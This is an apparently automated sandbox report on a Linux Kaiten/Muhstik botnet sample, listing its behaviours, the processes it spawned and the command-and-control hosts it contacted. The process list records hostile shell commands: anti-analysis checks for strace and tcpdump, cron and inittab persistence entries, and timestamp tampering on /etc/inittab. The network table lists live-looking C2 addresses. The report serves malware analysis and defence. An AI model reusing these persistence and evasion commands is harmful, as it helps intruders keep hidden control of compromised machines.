Malware Analysis Report

2024-11-15 09:40

Sample ID 220425-3xknradggj
Target pty3pejnyxxb
SHA256 7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Tags
persistence suricata kaiten
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3

Threat Level: Known bad

The file pty3pejnyxxb was found to be: Known bad.

Malicious Activity Summary

persistence suricata kaiten

Identified Kaiten Bot

Kaiten family

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

Writes file to system bin folder

Modifies hosts file

Writes DNS configuration

Write file to user bin folder

Modifies rc script

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-25 23:53

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-25 23:53

Reported

2022-04-26 00:01

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

11949s

Max time network

156s

Command Line

[./pty3pejnyxxb]

Signatures

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

suricata

Writes file to system bin folder

Description Indicator Process Target
/bin/uname /bin/uname N/A N/A
/bin/crontab /bin/crontab N/A N/A
/bin/nvram /bin/nvram N/A N/A

Modifies hosts file

Description Indicator Process Target
/etc/hosts /etc/hosts N/A N/A

Writes DNS configuration

Description Indicator Process Target
/etc/resolv.conf /etc/resolv.conf N/A N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.local /etc/rc.local ./pty3pejnyxxb N/A

Write file to user bin folder

Description Indicator Process Target
/usr/bin/crontab /usr/bin/crontab N/A N/A
/usr/sbin/nvram /usr/sbin/nvram N/A N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/pty3pejnyxxb /tmp/pty3pejnyxxb /bin/cp N/A
/tmp/pty3pejnyxxb /tmp/pty3pejnyxxb /bin/cp N/A
/tmp/pty3pejnyxxb /tmp/pty3pejnyxxb /bin/cp N/A
/tmp/pty3pejnyxxb /tmp/pty3pejnyxxb /bin/cp N/A
/tmp/.bawtz /tmp/.bawtz ./pty3pejnyxxb N/A

Processes

./pty3pejnyxxb

[./pty3pejnyxxb]

/bin/sh

[sh -c pidof -x strace > /dev/null]

/bin/pidof

[pidof -x strace]

/bin/sh

[sh -c pidof -x tcpdump > /dev/null]

/bin/pidof

[pidof -x tcpdump]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /tmp/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/sh

[sh -c crontab -r]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -r]

/bin/grep

[grep -v /tmp/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /tmp/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/pty3pejnyxxb" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c /bin/uname -n]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /dev/shm/pty3pejnyxxb]

/bin/uname

[/bin/uname -n]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /dev/shm/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/dev/shm/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /dev/shm/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep /dev/shm/pty3pejnyxxb]

/bin/grep

[grep -v /dev/shm/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/dev/shm/pty3pejnyxxb" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/tmp/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/tmp/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/tmp/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/tmp/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/tmp/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/tmp/pty3pejnyxxb]

/bin/sh

[sh -c echo "0:2345:respawn:/var/tmp/pty3pejnyxxb" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/lock/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/lock/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/lock/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/lock/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/lock/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/lock/pty3pejnyxxb]

/bin/sh

[sh -c echo "0:2345:respawn:/var/lock/pty3pejnyxxb" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/run/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/run/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/run/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/run/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v /var/run/pty3pejnyxxb]

/bin/grep

[grep /var/run/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/var/run/pty3pejnyxxb" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

Network

Country Destination Domain Proto
RO 89.33.194.89:8080 tcp
GB 178.159.3.213:8080 tcp
SG 185.201.8.176:8080 tcp
SG 37.44.244.106:8080 tcp
US 85.120.225.141:8080 tcp
SG 156.67.218.115:8080 tcp
SG 194.59.165.52:8080 tcp
SG 37.44.244.106:8080 tcp
US 144.172.71.162:8080 tcp
SG 37.44.244.106:8080 tcp
SG 185.201.8.176:8080 tcp
RO 89.33.194.89:8080 tcp
US 144.172.71.162:8080 tcp
US 1.1.1.1:53 oiii.deutschland-zahlung.eu udp
US 144.172.71.162:8080 tcp
US 144.172.71.162:8080 tcp
US 144.172.71.162:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
RU 195.70.197.29:8080 tcp
SG 156.67.218.115:8080 tcp
US 85.120.225.141:8080 tcp
SG 156.67.218.115:8080 tcp
NL 67.209.115.148:8080 tcp
SG 141.136.47.97:8080 tcp
US 85.120.225.141:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
US 144.172.71.162:8080 tcp
SG 156.67.218.115:8080 tcp
SG 185.201.8.176:8080 tcp
RO 89.33.194.89:8080 tcp
SG 156.67.218.115:8080 tcp

Files

N/A